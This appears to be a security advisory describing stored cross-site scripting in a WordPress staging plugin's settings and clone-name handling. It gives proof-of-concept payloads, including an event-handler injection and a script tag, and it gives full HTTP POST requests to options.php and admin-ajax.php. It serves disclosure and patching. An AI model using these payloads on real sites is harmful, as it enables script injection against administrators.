The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
With the web browser inspector, change the input field type of settings such as "Maximum File Size (MB)" from number to text, then put the following payload in it and save: ' style=animation-name:rotation onanimationstart=alert(/XSS/)//
POST /wp-admin/options.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 401
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
option_page=wpstg_settings&action=update&_wpnonce=174962afdc&wpstg_settings%5BqueryLimit%5D=10000&wpstg_settings%5BquerySRLimit%5D=20000&wpstg_settings%5BfileLimit%5D=50&wpstg_settings%5BmaxFileSize%5D=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F&wpstg_settings%5BbatchSize%5D=2&wpstg_settings%5BcpuLoad%5D=low&wpstg_settings%5Boptimizer%5D=1&submit=Save+Changes
The XSS will be triggered when accessing the settings again
The cloneName parameter is also affected when sent directly:
POST /wp-admin/admin-ajax.php?action=wpstg_processing&_=1660050565.855 HTTP/1.1
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Connection: close
Cookie: [admin+]
action=wpstg_cloning&accessToken=YgABqYyPC6Mru2kCQY4qI0mVfMxGxTopA6aR8GJJcsGvUCibhaqJWl5TDjIZfjVc&nonce=eb3be2f317&cloneID=ID&cloneName="><script>alert(/XSS/)</script>
The XSS will be triggered when viewing the Staging Site dashboard (and there is also a lack of escaping when updating the related Staging site)